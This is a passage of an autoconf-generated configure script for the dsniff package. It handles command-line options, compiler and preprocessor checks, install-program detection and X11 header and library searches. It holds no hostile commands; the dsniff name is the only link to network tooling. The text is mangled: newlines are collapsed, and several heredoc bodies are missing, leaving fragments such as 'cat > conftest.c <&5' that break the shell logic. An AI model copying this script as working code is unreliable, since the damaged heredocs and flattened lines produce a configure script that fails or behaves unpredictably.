-prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) prefix="$ac_optarg" ;; -program-prefix | --program-prefix | --program-prefi | --program-pref \ | --program-pre | --program-pr | --program-p) ac_prev=program_prefix ;; -program-prefix=* | --program-prefix=* | --program-prefi=* \ | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) program_prefix="$ac_optarg" ;; -program-suffix | --program-suffix | --program-suffi | --program-suff \ | --program-suf | --program-su | --program-s) ac_prev=program_suffix ;; -program-suffix=* | --program-suffix=* | --program-suffi=* \ | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) program_suffix="$ac_optarg" ;; -program-transform-name | --program-transform-name \ | --program-transform-nam | --program-transform-na \ | --program-transform-n | --program-transform- \ | --program-transform | --program-transfor \ | --program-transfo | --program-transf \ | --program-trans | --program-tran \ | --progr-tra | --program-tr | --program-t) ac_prev=program_transform_name ;; -program-transform-name=* | --program-transform-name=* \ | --program-transform-nam=* | --program-transform-na=* \ | --program-transform-n=* | --program-transform-=* \ | --program-transform=* | --program-transfor=* \ | --program-transfo=* | --program-transf=* \ | --program-trans=* | --program-tran=* \ | --progr-tra=* | --program-tr=* | --program-t=*) program_transform_name="$ac_optarg" ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil) silent=yes ;; -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) ac_prev=sbindir ;; -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ | --sbi=* | --sb=*) sbindir="$ac_optarg" ;; -sharedstatedir | --sharedstatedir | --sharedstatedi \ | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ | --sharedst | --shareds | --shared | --share | --shar \ | --sha | --sh) ac_prev=sharedstatedir ;; -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ | --sha=* | --sh=*) sharedstatedir="$ac_optarg" ;; -site | --site | --sit) ac_prev=site ;; -site=* | --site=* | --sit=*) site="$ac_optarg" ;; -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) ac_prev=srcdir ;; -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) srcdir="$ac_optarg" ;; -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ | --syscon | --sysco | --sysc | --sys | --sy) ac_prev=sysconfdir ;; -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) sysconfdir="$ac_optarg" ;; -target | --target | --targe | --targ | --tar | --ta | --t) ac_prev=target ;; -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) target="$ac_optarg" ;; -v | -verbose | --verbose | --verbos | --verbo | --verb) verbose=yes ;; -version | --version | --versio | --versi | --vers) echo "configure generated by autoconf version 2.13" exit 0 ;; -with-* | --with-*) ac_package=`echo $ac_option|sed -e 's/-*with-//' -e 's/=.*//'` # Reject names that are not valid shell variable names. if test -n "`echo $ac_package| sed 's/[-_a-zA-Z0-9]//g'`"; then { echo "configure: error: $ac_package: invalid package name" 1>&2; exit 1; } fi ac_package=`echo $ac_package| sed 's/-/_/g'` case "$ac_option" in *=*) ;; *) ac_optarg=yes ;; esac eval "with_${ac_package}='$ac_optarg'" ;; -without-* | --without-*) ac_package=`echo $ac_option|sed -e 's/-*without-//'` # Reject names that are not valid shell variable names. if test -n "`echo $ac_package| sed 's/[-a-zA-Z0-9_]//g'`"; then { echo "configure: error: $ac_package: invalid package name" 1>&2; exit 1; } fi ac_package=`echo $ac_package| sed 's/-/_/g'` eval "with_${ac_package}=no" ;; --x) # Obsolete; use --with-x. with_x=yes ;; -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ | --x-incl | --x-inc | --x-in | --x-i) ac_prev=x_includes ;; -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) x_includes="$ac_optarg" ;; -x-libraries | --x-libraries | --x-librarie | --x-librari \ | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) ac_prev=x_libraries ;; -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) x_libraries="$ac_optarg" ;; -*) { echo "configure: error: $ac_option: invalid option; use --help to show usage" 1>&2; exit 1; } ;; *) if test -n "`echo $ac_option| sed 's/[-a-z0-9.]//g'`"; then echo "configure: warning: $ac_option: invalid host type" 1>&2 fi if test "x$nonopt" != xNONE; then { echo "configure: error: can only configure for one host and one target at a time" 1>&2; exit 1; } fi nonopt="$ac_option" ;; esac done if test -n "$ac_prev"; then { echo "configure: error: missing argument to --`echo $ac_prev | sed 's/_/-/g'`" 1>&2; exit 1; } fi trap 'rm -fr conftest* confdefs* core core.* *.core $ac_clean_files; exit 1' 1 2 15 # File descriptor usage: # 0 standard input # 1 file creation # 2 errors and warnings # 3 some systems may open it to /dev/tty # 4 used on the Kubota Titan # 6 checking for... messages and results # 5 compiler messages saved in config.log if test "$silent" = yes; then exec 6>/dev/null else exec 6>&1 fi exec 5>./config.log echo "\ This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. " 1>&5 # Strip out --no-create and --no-recursion so they do not pile up. # Also quote any args containing shell metacharacters. ac_configure_args= for ac_arg do case "$ac_arg" in -no-create | --no-create | --no-creat | --no-crea | --no-cre \ | --no-cr | --no-c) ;; -no-recursion | --no-recursion | --no-recursio | --no-recursi \ | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) ;; *" "*|*" "*|*[\[\]\~\#\$\^\&\*\(\)\{\}\\\|\;\<\>\?]*) ac_configure_args="$ac_configure_args '$ac_arg'" ;; *) ac_configure_args="$ac_configure_args $ac_arg" ;; esac done # NLS nuisances. # Only set these to C if already set. These must not be set unconditionally # because not all systems understand e.g. LANG=C (notably SCO). # Fixing LC_MESSAGES prevents Solaris sh from translating var values in `set'! # Non-C LC_CTYPE values break the ctype check. if test "${LANG+set}" = set; then LANG=C; export LANG; fi if test "${LC_ALL+set}" = set; then LC_ALL=C; export LC_ALL; fi if test "${LC_MESSAGES+set}" = set; then LC_MESSAGES=C; export LC_MESSAGES; fi if test "${LC_CTYPE+set}" = set; then LC_CTYPE=C; export LC_CTYPE; fi # confdefs.h avoids OS command line length limits that DEFS can exceed. rm -rf conftest* confdefs.h # AIX cpp loses on an empty file, so make sure it contains at least a newline. echo > confdefs.h # A filename unique to this package, relative to the directory that # configure is in, which we can look for to find out if srcdir is correct. ac_unique_file=dsniff.c # Find the source files, if location was not specified. if test -z "$srcdir"; then ac_srcdir_defaulted=yes # Try the directory containing this script, then its parent. ac_prog=$0 ac_confdir=`echo $ac_prog|sed 's%/[^/][^/]*$%%'` test "x$ac_confdir" = "x$ac_prog" && ac_confdir=. srcdir=$ac_confdir if test ! -r $srcdir/$ac_unique_file; then srcdir=.. fi else ac_srcdir_defaulted=no fi if test ! -r $srcdir/$ac_unique_file; then if test "$ac_srcdir_defaulted" = yes; then { echo "configure: error: can not find sources in $ac_confdir or .." 1>&2; exit 1; } else { echo "configure: error: can not find sources in $srcdir" 1>&2; exit 1; } fi fi srcdir=`echo "${srcdir}" | sed 's%\([^/]\)/*$%\1%'` # Prefer explicitly selected file to automatically selected ones. if test -z "$CONFIG_SITE"; then if test "x$prefix" != xNONE; then CONFIG_SITE="$prefix/share/config.site $prefix/etc/config.site" else CONFIG_SITE="$ac_default_prefix/share/config.site $ac_default_prefix/etc/config.site" fi fi for ac_site_file in $CONFIG_SITE; do if test -r "$ac_site_file"; then echo "loading site script $ac_site_file" . "$ac_site_file" fi done if test -r "$cache_file"; then echo "loading cache $cache_file" . $cache_file else echo "creating cache $cache_file" > $cache_file fi ac_ext=c # CFLAGS is not in ac_cpp because -g, -O, etc. are not valid cpp options. ac_cpp='$CPP $CPPFLAGS' ac_compile='${CC-cc} -c $CFLAGS $CPPFLAGS conftest.$ac_ext 1>&5' ac_link='${CC-cc} -o conftest${ac_exeext} $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS 1>&5' cross_compiling=$ac_cv_prog_cc_cross ac_exeext= ac_objext=o if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then # Stardent Vistra SVR4 grep lacks -e, says ghazi@caip.rutgers.edu. if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then ac_n= ac_c=' ' ac_t=' ' else ac_n=-n ac_c= ac_t= fi else ac_n= ac_c='\c' ac_t= fi if test "$prefix" = "NONE"; then prefix="/usr/local" fi # Extract the first word of "gcc", so it can be a program name with args. set dummy gcc; ac_word=$2 echo $ac_n "checking for $ac_word""... $ac_c" 1>&6 echo "configure:547: checking for $ac_word" >&5 if eval "test \"`echo '$''{'ac_cv_prog_CC'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else IFS="${IFS= }"; ac_save_ifs="$IFS"; IFS=":" ac_dummy="$PATH" for ac_dir in $ac_dummy; do test -z "$ac_dir" && ac_dir=. if test -f $ac_dir/$ac_word; then ac_cv_prog_CC="gcc" break fi done IFS="$ac_save_ifs" fi fi CC="$ac_cv_prog_CC" if test -n "$CC"; then echo "$ac_t""$CC" 1>&6 else echo "$ac_t""no" 1>&6 fi if test -z "$CC"; then # Extract the first word of "cc", so it can be a program name with args. set dummy cc; ac_word=$2 echo $ac_n "checking for $ac_word""... $ac_c" 1>&6 echo "configure:577: checking for $ac_word" >&5 if eval "test \"`echo '$''{'ac_cv_prog_CC'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else IFS="${IFS= }"; ac_save_ifs="$IFS"; IFS=":" ac_prog_rejected=no ac_dummy="$PATH" for ac_dir in $ac_dummy; do test -z "$ac_dir" && ac_dir=. if test -f $ac_dir/$ac_word; then if test "$ac_dir/$ac_word" = "/usr/ucb/cc"; then ac_prog_rejected=yes continue fi ac_cv_prog_CC="cc" break fi done IFS="$ac_save_ifs" if test $ac_prog_rejected = yes; then # We found a bogon in the path, so make sure we never use it. set dummy $ac_cv_prog_CC shift if test $# -gt 0; then # We chose a different compiler from the bogus one. # However, it has the same basename, so the bogon will be chosen # first if we set CC to just the basename; use the full file name. shift set dummy "$ac_dir/$ac_word" "$@" shift ac_cv_prog_CC="$@" fi fi fi fi CC="$ac_cv_prog_CC" if test -n "$CC"; then echo "$ac_t""$CC" 1>&6 else echo "$ac_t""no" 1>&6 fi if test -z "$CC"; then case "`uname -s`" in *win32* | *WIN32*) # Extract the first word of "cl", so it can be a program name with args. set dummy cl; ac_word=$2 echo $ac_n "checking for $ac_word""... $ac_c" 1>&6 echo "configure:628: checking for $ac_word" >&5 if eval "test \"`echo '$''{'ac_cv_prog_CC'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else IFS="${IFS= }"; ac_save_ifs="$IFS"; IFS=":" ac_dummy="$PATH" for ac_dir in $ac_dummy; do test -z "$ac_dir" && ac_dir=. if test -f $ac_dir/$ac_word; then ac_cv_prog_CC="cl" break fi done IFS="$ac_save_ifs" fi fi CC="$ac_cv_prog_CC" if test -n "$CC"; then echo "$ac_t""$CC" 1>&6 else echo "$ac_t""no" 1>&6 fi ;; esac fi test -z "$CC" && { echo "configure: error: no acceptable cc found in \$PATH" 1>&2; exit 1; } fi echo $ac_n "checking whether the C compiler ($CC $CFLAGS $LDFLAGS) works""... $ac_c" 1>&6 echo "configure:660: checking whether the C compiler ($CC $CFLAGS $LDFLAGS) works" >&5 ac_ext=c # CFLAGS is not in ac_cpp because -g, -O, etc. are not valid cpp options. ac_cpp='$CPP $CPPFLAGS' ac_compile='${CC-cc} -c $CFLAGS $CPPFLAGS conftest.$ac_ext 1>&5' ac_link='${CC-cc} -o conftest${ac_exeext} $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS 1>&5' cross_compiling=$ac_cv_prog_cc_cross cat > conftest.$ac_ext << EOF #line 671 "configure" #include "confdefs.h" main(){return(0);} EOF if { (eval echo configure:676: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then ac_cv_prog_cc_works=yes # If we can't run a trivial program, we are probably using a cross compiler. if (./conftest; exit) 2>/dev/null; then ac_cv_prog_cc_cross=no else ac_cv_prog_cc_cross=yes fi else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 ac_cv_prog_cc_works=no fi rm -fr conftest* ac_ext=c # CFLAGS is not in ac_cpp because -g, -O, etc. are not valid cpp options. ac_cpp='$CPP $CPPFLAGS' ac_compile='${CC-cc} -c $CFLAGS $CPPFLAGS conftest.$ac_ext 1>&5' ac_link='${CC-cc} -o conftest${ac_exeext} $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS 1>&5' cross_compiling=$ac_cv_prog_cc_cross echo "$ac_t""$ac_cv_prog_cc_works" 1>&6 if test $ac_cv_prog_cc_works = no; then { echo "configure: error: installation or configuration problem: C compiler cannot create executables." 1>&2; exit 1; } fi echo $ac_n "checking whether the C compiler ($CC $CFLAGS $LDFLAGS) is a cross-compiler""... $ac_c" 1>&6 echo "configure:702: checking whether the C compiler ($CC $CFLAGS $LDFLAGS) is a cross-compiler" >&5 echo "$ac_t""$ac_cv_prog_cc_cross" 1>&6 cross_compiling=$ac_cv_prog_cc_cross echo $ac_n "checking whether we are using GNU C""... $ac_c" 1>&6 echo "configure:707: checking whether we are using GNU C" >&5 if eval "test \"`echo '$''{'ac_cv_prog_gcc'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else cat > conftest.c <&5; (eval $ac_try) 2>&5; }; } | egrep yes >/dev/null 2>&1; then ac_cv_prog_gcc=yes else ac_cv_prog_gcc=no fi fi echo "$ac_t""$ac_cv_prog_gcc" 1>&6 if test $ac_cv_prog_gcc = yes; then GCC=yes else GCC= fi ac_test_CFLAGS="${CFLAGS+set}" ac_save_CFLAGS="$CFLAGS" CFLAGS= echo $ac_n "checking whether ${CC-cc} accepts -g""... $ac_c" 1>&6 echo "configure:735: checking whether ${CC-cc} accepts -g" >&5 if eval "test \"`echo '$''{'ac_cv_prog_cc_g'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else echo 'void f(){}' > conftest.c if test -z "`${CC-cc} -g -c conftest.c 2>&1`"; then ac_cv_prog_cc_g=yes else ac_cv_prog_cc_g=no fi rm -f conftest* fi echo "$ac_t""$ac_cv_prog_cc_g" 1>&6 if test "$ac_test_CFLAGS" = set; then CFLAGS="$ac_save_CFLAGS" elif test $ac_cv_prog_cc_g = yes; then if test "$GCC" = yes; then CFLAGS="-g -O2" else CFLAGS="-g" fi else if test "$GCC" = yes; then CFLAGS="-O2" else CFLAGS= fi fi ac_aux_dir= for ac_dir in $srcdir $srcdir/.. $srcdir/../..; do if test -f $ac_dir/install-sh; then ac_aux_dir=$ac_dir ac_install_sh="$ac_aux_dir/install-sh -c" break elif test -f $ac_dir/install.sh; then ac_aux_dir=$ac_dir ac_install_sh="$ac_aux_dir/install.sh -c" break fi done if test -z "$ac_aux_dir"; then { echo "configure: error: can not find install-sh or install.sh in $srcdir $srcdir/.. $srcdir/../.." 1>&2; exit 1; } fi ac_config_guess=$ac_aux_dir/config.guess ac_config_sub=$ac_aux_dir/config.sub ac_configure=$ac_aux_dir/configure # This should be Cygnus configure. # Find a good install program. We prefer a C program (faster), # so one script is as good as another. But avoid the broken or # incompatible versions: # SysV /etc/install, /usr/sbin/install # SunOS /usr/etc/install # IRIX /sbin/install # AIX /bin/install # AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag # AFS /usr/afsws/bin/install, which mishandles nonexistent args # SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" # ./install, which can be erroneously created by make from ./install.sh. echo $ac_n "checking for a BSD compatible install""... $ac_c" 1>&6 echo "configure:797: checking for a BSD compatible install" >&5 if test -z "$INSTALL"; then if eval "test \"`echo '$''{'ac_cv_path_install'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else IFS="${IFS= }"; ac_save_IFS="$IFS"; IFS=":" for ac_dir in $PATH; do # Account for people who put trailing slashes in PATH elements. case "$ac_dir/" in /|./|.//|/etc/*|/usr/sbin/*|/usr/etc/*|/sbin/*|/usr/afsws/bin/*|/usr/ucb/*) ;; *) # OSF1 and SCO ODT 3.0 have their own names for install. # Don't use installbsd from OSF since it installs stuff as root # by default. for ac_prog in ginstall scoinst install; do if test -f $ac_dir/$ac_prog; then if test $ac_prog = install && grep dspmsg $ac_dir/$ac_prog >/dev/null 2>&1; then # AIX install. It has an incompatible calling convention. : else ac_cv_path_install="$ac_dir/$ac_prog -c" break 2 fi fi done ;; esac done IFS="$ac_save_IFS" fi if test "${ac_cv_path_install+set}" = set; then INSTALL="$ac_cv_path_install" else # As a last resort, use the slow shell script. We don't cache a # path for INSTALL within a source directory, because that will # break other packages using the cache if that directory is # removed, or if the path is relative. INSTALL="$ac_install_sh" fi fi echo "$ac_t""$INSTALL" 1>&6 # Use test -z because SunOS4 sh mishandles braces in ${var-val}. # It thinks the first close brace ends the variable substitution. test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL_PROGRAM}' test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' # Extract the first word of "ranlib", so it can be a program name with args. set dummy ranlib; ac_word=$2 echo $ac_n "checking for $ac_word""... $ac_c" 1>&6 echo "configure:852: checking for $ac_word" >&5 if eval "test \"`echo '$''{'ac_cv_prog_RANLIB'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else if test -n "$RANLIB"; then ac_cv_prog_RANLIB="$RANLIB" # Let the user override the test. else IFS="${IFS= }"; ac_save_ifs="$IFS"; IFS=":" ac_dummy="$PATH" for ac_dir in $ac_dummy; do test -z "$ac_dir" && ac_dir=. if test -f $ac_dir/$ac_word; then ac_cv_prog_RANLIB="ranlib" break fi done IFS="$ac_save_ifs" test -z "$ac_cv_prog_RANLIB" && ac_cv_prog_RANLIB=":" fi fi RANLIB="$ac_cv_prog_RANLIB" if test -n "$RANLIB"; then echo "$ac_t""$RANLIB" 1>&6 else echo "$ac_t""no" 1>&6 fi echo $ac_n "checking how to run the C preprocessor""... $ac_c" 1>&6 echo "configure:881: checking how to run the C preprocessor" >&5 # On Suns, sometimes $CPP names a directory. if test -n "$CPP" && test -d "$CPP"; then CPP= fi if test -z "$CPP"; then if eval "test \"`echo '$''{'ac_cv_prog_CPP'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else # This must be in double quotes, not single quotes, because CPP may get # substituted into the Makefile and "${CC-cc}" will confuse make. CPP="${CC-cc} -E" # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. cat > conftest.$ac_ext < Syntax Error EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:902: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then : else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* CPP="${CC-cc} -E -traditional-cpp" cat > conftest.$ac_ext < Syntax Error EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:919: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then : else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* CPP="${CC-cc} -nologo -E" cat > conftest.$ac_ext < Syntax Error EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:936: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then : else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* CPP=/lib/cpp fi rm -f conftest* fi rm -f conftest* fi rm -f conftest* ac_cv_prog_CPP="$CPP" fi CPP="$ac_cv_prog_CPP" else ac_cv_prog_CPP="$CPP" fi echo "$ac_t""$CPP" 1>&6 # If we find X, set shell vars x_includes and x_libraries to the # paths, otherwise set no_x=yes. # Uses ac_ vars as temps to allow command line to override cache and checks. # --without-x overrides everything else, but does not touch the cache. echo $ac_n "checking for X""... $ac_c" 1>&6 echo "configure:965: checking for X" >&5 # Check whether --with-x or --without-x was given. if test "${with_x+set}" = set; then withval="$with_x" : fi # $have_x is `yes', `no', `disabled', or empty when we do not yet know. if test "x$with_x" = xno; then # The user explicitly disabled X. have_x=disabled else if test "x$x_includes" != xNONE && test "x$x_libraries" != xNONE; then # Both variables are already set. have_x=yes else if eval "test \"`echo '$''{'ac_cv_have_x'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else # One or both of the vars are not set, and there is no cached value. ac_x_includes=NO ac_x_libraries=NO rm -fr conftestdir if mkdir conftestdir; then cd conftestdir # Make sure to not put "make" in the Imakefile rules, since we grep it out. cat > Imakefile <<'EOF' acfindx: @echo 'ac_im_incroot="${INCROOT}"; ac_im_usrlibdir="${USRLIBDIR}"; ac_im_libdir="${LIBDIR}"' EOF if (xmkmf) >/dev/null 2>/dev/null && test -f Makefile; then # GNU make sometimes prints "make[1]: Entering...", which would confuse us. eval `${MAKE-make} acfindx 2>/dev/null | grep -v make` # Open Windows xmkmf reportedly sets LIBDIR instead of USRLIBDIR. for ac_extension in a so sl; do if test ! -f $ac_im_usrlibdir/libX11.$ac_extension && test -f $ac_im_libdir/libX11.$ac_extension; then ac_im_usrlibdir=$ac_im_libdir; break fi done # Screen out bogus values from the imake configuration. They are # bogus both because they are the default anyway, and because # using them would break gcc on systems where it needs fixed includes. case "$ac_im_incroot" in /usr/include) ;; *) test -f "$ac_im_incroot/X11/Xos.h" && ac_x_includes="$ac_im_incroot" ;; esac case "$ac_im_usrlibdir" in /usr/lib | /lib) ;; *) test -d "$ac_im_usrlibdir" && ac_x_libraries="$ac_im_usrlibdir" ;; esac fi cd .. rm -fr conftestdir fi if test "$ac_x_includes" = NO; then # Guess where to find include files, by looking for this one X11 .h file. test -z "$x_direct_test_include" && x_direct_test_include=X11/Intrinsic.h # First, try using that file with no special directory specified. cat > conftest.$ac_ext < EOF ac_try="$ac_cpp conftest.$ac_ext >/dev/null 2>conftest.out" { (eval echo configure:1032: \"$ac_try\") 1>&5; (eval $ac_try) 2>&5; } ac_err=`grep -v '^ *+' conftest.out | grep -v "^conftest.${ac_ext}\$"` if test -z "$ac_err"; then rm -rf conftest* # We can compile using X headers with no special include directory. ac_x_includes= else echo "$ac_err" >&5 echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* # Look for the header file in a standard set of common directories. # Check X11 before X11Rn because it is often a symlink to the current release. for ac_dir in \ /usr/X11/include \ /usr/X11R6/include \ /usr/X11R5/include \ /usr/X11R4/include \ \ /usr/include/X11 \ /usr/include/X11R6 \ /usr/include/X11R5 \ /usr/include/X11R4 \ \ /usr/local/X11/include \ /usr/local/X11R6/include \ /usr/local/X11R5/include \ /usr/local/X11R4/include \ \ /usr/local/include/X11 \ /usr/local/include/X11R6 \ /usr/local/include/X11R5 \ /usr/local/include/X11R4 \ \ /usr/X386/include \ /usr/x386/include \ /usr/XFree86/include/X11 \ \ /usr/include \ /usr/local/include \ /usr/unsupported/include \ /usr/athena/include \ /usr/local/x11r5/include \ /usr/lpp/Xamples/include \ \ /usr/openwin/include \ /usr/openwin/share/include \ ; \ do if test -r "$ac_dir/$x_direct_test_include"; then ac_x_includes=$ac_dir break fi done fi rm -f conftest* fi # $ac_x_includes = NO if test "$ac_x_libraries" = NO; then # Check for the libraries. test -z "$x_direct_test_library" && x_direct_test_library=Xt test -z "$x_direct_test_function" && x_direct_test_function=XtMalloc # See if we find them without any special options. # Don't add to $LIBS permanently. ac_save_LIBS="$LIBS" LIBS="-l$x_direct_test_library $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* LIBS="$ac_save_LIBS" # We can link X programs with no special library path. ac_x_libraries= else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* LIBS="$ac_save_LIBS" # First see if replacing the include by lib works. # Check X11 before X11Rn because it is often a symlink to the current release. for ac_dir in `echo "$ac_x_includes" | sed s/include/lib/` \ /usr/X11/lib \ /usr/X11R6/lib \ /usr/X11R5/lib \ /usr/X11R4/lib \ \ /usr/lib/X11 \ /usr/lib/X11R6 \ /usr/lib/X11R5 \ /usr/lib/X11R4 \ \ /usr/local/X11/lib \ /usr/local/X11R6/lib \ /usr/local/X11R5/lib \ /usr/local/X11R4/lib \ \ /usr/local/lib/X11 \ /usr/local/lib/X11R6 \ /usr/local/lib/X11R5 \ /usr/local/lib/X11R4 \ \ /usr/X386/lib \ /usr/x386/lib \ /usr/XFree86/lib/X11 \ \ /usr/lib \ /usr/local/lib \ /usr/unsupported/lib \ /usr/athena/lib \ /usr/local/x11r5/lib \ /usr/lpp/Xamples/lib \ /lib/usr/lib/X11 \ \ /usr/openwin/lib \ /usr/openwin/share/lib \ ; \ do for ac_extension in a so sl; do if test -r $ac_dir/lib${x_direct_test_library}.$ac_extension; then ac_x_libraries=$ac_dir break 2 fi done done fi rm -f conftest* fi # $ac_x_libraries = NO if test "$ac_x_includes" = NO || test "$ac_x_libraries" = NO; then # Didn't find X anywhere. Cache the known absence of X. ac_cv_have_x="have_x=no" else # Record where we found X for the cache. ac_cv_have_x="have_x=yes \ ac_x_includes=$ac_x_includes ac_x_libraries=$ac_x_libraries" fi fi fi eval "$ac_cv_have_x" fi # $with_x != no if test "$have_x" != yes; then echo "$ac_t""$have_x" 1>&6 no_x=yes else # If each of the values was on the command line, it overrides each guess. test "x$x_includes" = xNONE && x_includes=$ac_x_includes test "x$x_libraries" = xNONE && x_libraries=$ac_x_libraries # Update the cache value to reflect the command line values. ac_cv_have_x="have_x=yes \ ac_x_includes=$x_includes ac_x_libraries=$x_libraries" echo "$ac_t""libraries $x_libraries, headers $x_includes" 1>&6 fi if test "$no_x" = yes; then # Not all programs may use this symbol, but it does not hurt to define it. cat >> confdefs.h <<\EOF #define X_DISPLAY_MISSING 1 EOF X_CFLAGS= X_PRE_LIBS= X_LIBS= X_EXTRA_LIBS= else if test -n "$x_includes"; then X_CFLAGS="$X_CFLAGS -I$x_includes" fi # It would also be nice to do this for all -L options, not just this one. if test -n "$x_libraries"; then X_LIBS="$X_LIBS -L$x_libraries" # For Solaris; some versions of Sun CC require a space after -R and # others require no space. Words are not sufficient . . . . case "`(uname -sr) 2>/dev/null`" in "SunOS 5"*) echo $ac_n "checking whether -R must be followed by a space""... $ac_c" 1>&6 echo "configure:1214: checking whether -R must be followed by a space" >&5 ac_xsave_LIBS="$LIBS"; LIBS="$LIBS -R$x_libraries" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* ac_R_nospace=yes else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_R_nospace=no fi rm -f conftest* if test $ac_R_nospace = yes; then echo "$ac_t""no" 1>&6 X_LIBS="$X_LIBS -R$x_libraries" else LIBS="$ac_xsave_LIBS -R $x_libraries" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* ac_R_space=yes else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* ac_R_space=no fi rm -f conftest* if test $ac_R_space = yes; then echo "$ac_t""yes" 1>&6 X_LIBS="$X_LIBS -R $x_libraries" else echo "$ac_t""neither works" 1>&6 fi fi LIBS="$ac_xsave_LIBS" esac fi # Check for system-dependent libraries X programs must link with. # Do this before checking for the system-independent R6 libraries # (-lICE), since we may need -lsocket or whatever for X linking. if test "$ISC" = yes; then X_EXTRA_LIBS="$X_EXTRA_LIBS -lnsl_s -linet" else # Martyn.Johnson@cl.cam.ac.uk says this is needed for Ultrix, if the X # libraries were built with DECnet support. And karl@cs.umb.edu says # the Alpha needs dnet_stub (dnet does not exist). echo $ac_n "checking for dnet_ntoa in -ldnet""... $ac_c" 1>&6 echo "configure:1279: checking for dnet_ntoa in -ldnet" >&5 ac_lib_var=`echo dnet'_'dnet_ntoa | sed 'y%./+-%__p_%'` if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then echo $ac_n "(cached) $ac_c" 1>&6 else ac_save_LIBS="$LIBS" LIBS="-ldnet $LIBS" cat > conftest.$ac_ext <&5; (eval $ac_link) 2>&5; } && test -s conftest${ac_exeext}; then rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=yes" else echo "configure: failed program was:" >&5 cat conftest.$ac_ext >&5 rm -rf conftest* eval "ac_cv_lib_$ac_lib_var=no" fi rm -f conftest* LIBS="$ac_save_LIBS" fi if 